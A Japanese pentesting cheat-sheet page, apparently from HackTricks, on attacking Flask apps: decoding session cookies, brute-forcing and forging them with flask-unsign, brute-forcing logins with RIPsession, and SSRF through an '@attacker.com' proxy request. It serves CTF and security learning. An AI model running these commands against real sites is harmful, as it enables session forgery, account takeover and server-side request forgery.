Trickestを使用して、世界で最も先進的なコミュニティツールによって駆動されるワークフローを簡単に構築し、自動化します。
今すぐアクセスを取得:
おそらく、CTFをプレイしている場合、Flaskアプリケーションは SSTIに関連しています。
Cookies
デフォルトのクッキーセッション名は**session**です。
Decoder
オンラインFlaskクッキーデコーダー: https://www.kirsle.net/wizards/flask-session.cgi
Manual
クッキーの最初の部分を最初のピリオドまで取得し、Base64デコードします。
echo "ImhlbGxvIg" | base64 -d
クッキーはパスワードを使用して署名されています
Flask-Unsign
Flaskアプリケーションのセッションクッキーを取得、デコード、ブルートフォース、作成するためのコマンドラインツールで、秘密鍵を推測します。
pip3 install flask-unsign
クッキーのデコード
flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
ブルートフォース
flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval
署名
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
レガシー(古いバージョン)を使用した署名
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
RIPsession
flask-unsignを使用して作成されたクッキーを使用してウェブサイトをブルートフォースするコマンドラインツールです。
ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
FlaskセッションクッキーにおけるSQLiとSQLmap
この例では、sqlmapのevalオプションを使用して、既知の秘密を使用してFlask用のsqlmapペイロードを自動的に署名します。
SSRFへのFlaskプロキシ
この文書では、Flaskが「@」という文字で始まるリクエストをどのように許可するかが説明されています。
GET @/ HTTP/1.1
Host: target.com
Connection: close
以下のシナリオのうち:
from flask import Flask
from requests import get
app = Flask('__main__')
SITE_NAME = 'https://google.com/'
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content
app.run(host='0.0.0.0', port=8080)
次のような "@attacker.com" を導入することを許可する可能性があり、SSRFを引き起こすことができます。
Trickest を使用して、世界で最も高度なコミュニティツールによって駆動されるワークフローを簡単に構築し、自動化します。
今すぐアクセスを取得:
Last updated
